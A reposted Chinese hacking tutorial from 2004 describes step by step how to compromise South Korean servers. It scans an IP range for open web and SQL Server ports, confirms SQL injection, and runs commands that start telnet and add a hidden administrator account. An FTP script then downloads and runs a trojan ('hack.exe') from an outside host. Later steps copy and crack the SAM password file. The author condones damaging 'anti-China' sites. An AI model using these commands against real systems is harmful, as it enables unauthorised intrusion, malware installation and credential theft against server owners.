收藏本站 收藏本站
积木网首页 - 软件测试 - 常用手册 - 站长工具 - 技术社区
积木学院 > 安全防范 > 网络安全 > 正文

我是这样走进韩国肉鸡的

来源:互联摘选 日期:2004-04-21 01:40
由于最近要破解一个文件迫切需要一台"高速"肉鸡用,所以想找个现成的,发现很多论坛发布sql肉鸡,不过经过我测试(利用sqltools上传程序,提示成功,但就是找不到文件)很多都不能用,可能对方的杀毒软件把你的给杀了,也可能是对方的磁盘不允许修改,帐户权限低,下

面我们换一种思路来走进sql主机。

为了找到一台合适的肉鸡,自己来动手吧,首先锁定目标,用ip数据库查询器查找韩国或者日本的ip(只要不是中国的就行),拿出scanner

来扫描开放80和1433端口的主机,因为我们是利用web程序来查找开放大门主机,所以要扫描开放1433服务的主机。cmd下进入scanner所在的目

录,输入命令:scanner TCP 168.188.0.0 168.188.255.255 80,1433 400 /save 然后运行,意思是系统用400线程扫描该段80和1433端口开

放的主机,并将结果保存,好了,让他扫描吧,扫描结束后在该目录下的result.txt中保存结果。打开result.txt,里面已经有不少符合条件

主机等着我们的光临。随便复制一个ip 168.188.xxx.xxx,打开浏览器,访问该网站,访问该网站的分页面,

http://168.188.xxx.xxx/read.asp?page=1&no=16,在后面加入的and 1=1页面显示正常,输入 and 1=2出现错误:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Incorrect syntax near the keyword 'where'.

/movie/movie.asp, line 128

好,该主机存在漏洞,那就拿下他。这次我用另外一个小工具GYSIcmd来打开进入主机的小门,该工具能够利用利用网站程序漏洞运行DOS命令

,在注入地址中输入http://168.188.xxx.xxx/read.asp?page=1&no=16,然后在DOS命令中输入net start telnet ,现在已开启了telnet服务

,接着执行net user qq qq123 /add为进入主机添加一个帐号,提升为管理员net localgroup administrators qq /add ,到此已经完成了进入

前的准备工作.
下面在为进入主机铺上一条小路,我们好从这上面走过去呀。 在桌面上新建一个CMD快捷方式,指向C:\WINNT\system32\CMD.EXE ,选中属

性中的以其他用户身份运行。现在运行该程序,在用户中用我们刚才建立的用户qq(qq123)运行,直接运行telnet 168.188.xxx.xxx ,提示是

否发送密码,输入y,这就进入了主机。呵呵,偷偷的进了人家屋里了,该控制了,下面来给它传文件,传个反弹木马,或者开3389,由于我的

速度很慢,就不在我机子上开tftp服务了,直接用一个批处理文件来传送,输入:

echo open ftp.myweb.com 21>ftp.txt
echo name>>ftp.txt
echo password>>ftp.txt
echo get hack.exe>>ftp.txt
echo bye

一次一行,输入完后就在对方根目录下有了一个文件ftp.txt,下面执行:
ftp -s:ftp.txt
在屏幕上可看到一行行的显示执行,你能看到执行的过程,他是看不到的,文件传完了,删除该文件del ftp.txt
运行hack.exe,好,打开我机子上的鸽子,显示有主机上线,呵呵,到手了,任务完成了,想干什么就做吧,不过奉劝一句,不要破坏,即使

是国外的机子,要不要删他的数据,除非反华的或者色情站点。如果想更方便的控制,可给他开3389。然后登陆3389进行管理,帮他补上漏洞(

作雷锋了)..
在我进入的主机中,碰到的情况是不一样的,有的主机已开了3389,可以利用命令query user 查看主机在线人员,如果管理员在线,通时还有

人使用3389登陆到了主机,那么很可能就是已经被人捷足先登了,踢他出去logoff 1 ,怎么办在自己了.
如果传送上去的文件无法运行,那就说明对方已经禁止运行权限,只是允许某个特定的用户有运行权限,这时可以传他的sam文件,进入

C:\WINNT\repair>目录,利用FTP的上传功能,来破解他的用户密码。破解sam密码的软件很多,如LC,最近不是出了一款新的,好象叫

SAMinside.破解出来密码后,挨着试试,一般不会超过6个用户,定有一个帐户有运行权限。如果都不行,那么还有一个方法...不过该方法虽

能运行,但运行后管理员登陆就能发现主机被人入侵,所以就不说了,谁有更好后的办法运行,多多指教。
方法不局限于一点 一个学习网络安全的爱好者 也切忌把自己的思维固定在一点 ,一定要活跃 还要在踏上这条路的时候 一定要学会好好使用

搜索引擎和独立思考的习惯\因为你一开始就是一个黑暗中孤独的天使啊\唯一依靠自己才是最好的武器啊

(出处:http://www.Gimoo.net)

推荐阅读

 

热点信息

 
强悍的草根IT技术社区,这里应该有您想要的!
Copyright © 2010 Gimoo.Net. All Rights Rreserved  京ICP备05050695号